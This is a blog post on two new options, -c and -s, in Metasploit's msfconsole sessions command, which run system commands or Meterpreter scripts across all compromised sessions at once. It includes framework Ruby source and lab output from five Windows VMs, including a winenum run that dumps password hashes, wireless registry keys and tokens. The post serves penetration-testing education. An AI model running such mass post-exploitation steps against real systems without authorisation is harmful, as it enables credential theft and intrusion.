
New Options in Msfconsole Sessions Command

Metasploit recently added 2 new options to the sessions command in msfconsole. This 2 options are the ability to run commands on all open sessions and to run a Meterpreter script on all sessions that are of Meterpreter type. I consider this 2 options game changers when it comes to post exploitation since now one can run a command thru out a series of shells and be able to automate all sessions with Meterpreter at the same time.

Here is the output of the sessions command showing all options, the –c for the command execution and the –s for script execution.

msf exploit(handler) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.


-K Terminate all sessions.
-c <opt> Run a command on all live sessions
-d <opt> Detach an interactive session
-h Help banner.
-i <opt> Interact with the supplied session identifier.
-k <opt> Terminate session.
-l List all active sessions.
-q Quiet mode.
-s <opt> Run a script on all live meterpreter sessions
-v List verbose fields.

msf exploit(handler) >

Currently I have 5 session open to different systems all behind a series of firewalls that is why all sessions appear to come from a single IP.

msf exploit(handler) > sessions -l 

Active sessions

Id Description Tunnel
-- ----------- ------
1 Meterpreter ->
2 Meterpreter ->
3 Meterpreter ->
4 Meterpreter ->
5 Meterpreter ->

msf exploit(handler) >

Another very useful option that was added is the –v for verbose, this lets us know if the session was the result of an exploit, what exploit or received by Multi Handler.

msf exploit(handler) > sessions -v

Active sessions

Id Description Tunnel Via
-- ----------- ------ ---
1 Meterpreter -> multi/handler
2 Meterpreter -> multi/handler
3 Meterpreter -> multi/handler
4 Meterpreter -> multi/handler
5 Meterpreter -> multi/handler

msf exploit(handler) >


Here is the code that is executed when the –c option is ran:

  1: cmds.each do |cmd|
  2: 	framework.sessions.each_sorted do |s|
  3: 		session = framework.sessions.get(s)
  4: 		print_status("Running '#{cmd}' on session #{s} (#{session.tunnel_peer})")
  5: 		if (session.type == "meterpreter")
  6: 			c,args = cmd.split(' ', 2)
  7: 			begin
  8: 				process = session.sys.process.execute(c, args, {
  9: 						'Channelized' => true,
 10: 						'Hidden'      => true
 11: 					})
 12: 			rescue ::Rex::Post::Meterpreter::RequestError
 13: 				print_error("Failed: #{$!.class} #{$!}")
 15: 			end
 16: 			print_line( if process and
 17: 		elsif session.type == "shell"
 18: 			# Then it's a regular shell, just send the command
 19: 			# to the session's stdin.
 20: 			session.write_shell(cmd + "n")
 21: 			# read_shell blocks with no timeout, so we wrap
 22: 			# it in a select in case there is no output
 23: 			# from the command
 24: 			if select([session.rstream],nil,nil,3)
 25: 				output = session.read_shell
 26: 				print_line(output)
 27: 			end
 28: 		end
 29: 		# If the session isn't a meterpreter or shell type, it
 30: 		# could be a VNC session (which can't run commands) or
 31: 		# something custom (which we don't know how to run
 32: 		# commands on), so don't bother.
 33: 	end
 34: end

As it can be seen in the line 1 and 2 all commands are iterated one by one against each available session, the in likes 5 and 17 the sessions are checked to see if each one either a Meterpreter shell or a simple command Shell, this means we can write plug-ins that can automate against both types of shell using this code as example. As it can be seen in line 8 the type of command that we can run is a system command so none of the other Meterpreter commands can be used. Also on important thing to notice is that the rules for operating in a shell apply so one must be careful not to run commands that can break a shell like WMIC or certain types of SC. Lets run the hostname command on all shells:

msf exploit(handler) > sessions -c hostname
[*] Running 'hostname' on session 1 (

[*] Running 'hostname' on session 2 (

[*] Running 'hostname' on session 3 (

[*] Running 'hostname' on session 4 (

[*] Running 'hostname' on session 5 (

msf exploit(handler) >

Now if we want to run commands with arguments we have to enclosed the command and the arguments in quotes, also remember that since this is ruby special characters must be escaped where it applies.  For example:

msf exploit(handler) > sessions -c 'reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ProductName'
[*] Running 'reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ProductName' on session 1 (


ProductName REG_SZ Microsoft Windows XP

[*] Running 'reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ProductName' on session 2 (

ProductName REG_SZ Microsoft Windows Server 2003

[*] Running 'reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ProductName' on session 3 (

ProductName REG_SZ Windows 7 Enterprise

[*] Running 'reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ProductName' on session 4 (

ProductName REG_SZ Windows Vista (TM) Enterprise

[*] Running 'reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ProductName' on session 5 (

ProductName REG_SZ Windows Server (R) 2008 Enterprise

msf exploit(handler) >

The –s option for running script is also an important one that will allow an attacker to automate several actions against a large number of sessions. Here is where I see that several steps will have to be taken when writing scripts to be used with this option, this are:

  • Proper logging of data will become very important do to the possibility that a large number of shells are processed.
  • Logs should reference the host name or host local IP of a target since many systems are now behind NAT firewalls.
  • Multi Threading will be of great importance since each session is handle sequentially so having Multi Threaded scripts will be a great time saver.
  • Scripts should at least output the hostname so the attacker can now what host he is currently running the script against.
  • At the moment the script must run without options.

Here is the code executed when executing this option:

  1: if (not script.nil?)
  2: 	print_status("Running script #{script} on all meterpreter sessions ...")
  3: 	framework.sessions.each_sorted do |s|
  4: 		if ((session = framework.sessions.get(s)))
  5: 			if (session.type == "meterpreter")
  6: 				print_status("Session #{s} (#{session.tunnel_peer}):")
  7: 				begin
  8: 					client = session
  9: 					client.execute_script(script, binding)
 10: 				rescue ::Exception => e
 11: 					log_error("Error executing script: #{e.class} #{e}")
 12: 				end
 13: 			end
 14: 		end
 15: 	end
 16: else
 17: 	print_error("No script specified!")
 18: end

As it can be seen in line 5 only the sessions that are of Meterpreter type are the ones that will be interacted with.

Here is a summarized version of running winenum:

   1: msf exploit(handler) > sessions -s winenum

   2: [*] Running script winenum on all meterpreter sessions ...

   3: [*] Session 1 (

   4: [*] Running Windows Local Enumerion Meterpreter Script

   5: [*] New session on

   6: [*] Saving report to /home/carlos/.msf3/logs/winenum/WINXPLAB01_20091225.4410-04411/WINXPLAB01_20091225.4410-04411.txt

   7: [*] Checking if WINXPLAB01 is a Virtual Machine ........

   8: [*] BIOS Check Failed

   9: [*]     This is a VMWare virtual Machine

  10: [*] Running Command List ...

  11: [*]     running command cmd.exe /c set

  12: [*]     running command ipconfig /all

  13: ..........

  14: [*] Running WMIC Commands ....

  15: [*]     running command wmic computersystem list brief

  16: ..........

  17: [*] Extracting software list from registry

  18: [*] Dumping and Downloading the Registry entries for Configured Wireless Networks

  19: [*]     Exporting HKLMSoftwareMicrosoftWZCSVCParametersInterfaces

  20: [*]     Compressing key into cab file for faster download

  21: [*]     Downloading to -> /home/carlos/.msf3/logs/winenum/WINXPLAB01_20091225.4410-04411/

  22: [*]     Deleting left over files

  23: [*] Dumping password hashes...

  24: [*] Hashes Dumped

  25: [*] Getting Tokens...

  26: [*] All tokens have been processed

  27: [*] Done!

  28: [*] Session 2 (

  29: [*] Running Windows Local Enumerion Meterpreter Script

  30: [*] New session on

  31: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN2K3LAB01_20091225.4538-95293/WIN2K3LAB01_20091225.4538-95293.txt

  32: [*] Checking if WIN2K3LAB01 is a Virtual Machine ........

  33: [*]     This is a VMware Workstation/Fusion Virtual Machine

  34: [*] Running Command List ...

  35: [*]     running command cmd.exe /c set

  36: ..........

  37: [*] Running WMIC Commands ....

  38: [*]     running command wmic computersystem list brief

  39: ..........

  40: [*] Extracting software list from registry

  41: [*] Dumping password hashes...

  42: [*] Hashes Dumped

  43: [*] Getting Tokens...

  44: [*] All tokens have been processed

  45: [*] Done!

  46: [*] Session 3 (

  47: [*] Running Windows Local Enumerion Meterpreter Script

  48: [*] New session on

  49: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN701_20091225.4637-88208/WIN701_20091225.4637-88208.txt

  50: [*] Checking if WIN701 is a Virtual Machine ........

  51: [*]     This is a VMware Workstation/Fusion Virtual Machine

  52: [*] Checking if UAC is enabled ...

  53: [*]     UAC is Enabled

  54: [*] Running Command List ...

  55: [*]     running command cmd.exe /c set

  56: ..........

  57: [*] Running WMIC Commands ....

  58: [*]     running command wmic computersystem list brief

  59: ..........

  60: [*] Extracting software list from registry

  61: [*] UAC is enabled, Wireless key Registry could not be dumped under current privileges

  62: [-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.

  63: [*] Getting Tokens...

  64: [*] Error Getting Tokens: Rex::TimeoutError Operation timed out.

  65: [*] Done!

  66: [*] Session 4 (

  67: [*] Running Windows Local Enumerion Meterpreter Script

  68: [*] New session on

  69: [*] Saving report to /home/carlos/.msf3/logs/winenum/WINVIS01_20091225.4927-83932/WINVIS01_20091225.4927-83932.txt

  70: [*] Checking if WINVIS01 is a Virtual Machine ........

  71: [*]     This is a VMware Workstation/Fusion Virtual Machine

  72: [*] Checking if UAC is enabled ...

  73: [*]     UAC is Enabled

  74: [*] Running Command List ...

  75: [*]     running command cmd.exe /c set

  76: ..........

  77: [*] Running WMIC Commands ....

  78: [*]     running command wmic computersystem list brief

  79: ..........

  80: [*] Extracting software list from registry

  81: [*] UAC is enabled, Wireless key Registry could not be dumped under current privileges

  82: [-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.

  83: [*] Getting Tokens...

  84: [*] All tokens have been processed

  85: [*] Done!

  86: [*] Session 5 (

  87: [*] Running Windows Local Enumerion Meterpreter Script

  88: [*] New session on

  89: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN-YR4V852V71Y_20091225.5019-40179/WIN-YR4V852V71Y_20091225.5019-40179.txt

  90: [*] Checking if WIN-YR4V852V71Y is a Virtual Machine ........

  91: [*]     This is a VMware Workstation/Fusion Virtual Machine

  92: [*] Running Command List ...

  93: [*]     running command cmd.exe /c set

  94: ..........

  95: [*] Running WMIC Commands ....

  96: [*]     running command wmic computersystem list brief

  97: ..........

  98: [*] Extracting software list from registry

  99: [-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.

 100: [*] Getting Tokens...

 101: [*] All tokens have been processed

 102: [*] Done!

 103: msf exploit(handler) > 

As it can be seen the Framework is advancing a great number of features and new options are being added. I do have to say that the path in which the HD moved the Framework when joining forces with Rapid7 is paying off in a more robust and faster release cycle.

Carlos Perez

Carlos is currently the Principal Consultant, Team Lead for Research at TrustedSec and well-known for his research on both Metasploit and Windows Powershell. His blog carries the tag line: “Shell Is Only The Beginning”.

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